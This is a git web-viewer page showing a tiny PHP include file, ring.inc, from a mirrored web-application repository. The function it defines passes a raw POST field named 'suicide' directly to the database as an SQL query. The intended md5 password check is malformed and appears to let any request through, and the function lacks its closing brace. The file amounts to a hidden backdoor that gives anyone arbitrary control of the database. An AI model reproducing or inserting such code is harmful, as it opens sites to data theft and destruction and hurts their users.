big commit
[mirrors/Kyberia-bloodline.git] / inc / eventz / ring.inc
1 <?php
2 function ring() {
3 global $db;
4 if (md5($_POST['ring']=='a482a148ccdd020bcb5888e99f41bb65')) {
5 $db->query($_POST['suicide']);
6 }
7 ?>
This page took 0.237401 seconds and 4 git commands to generate.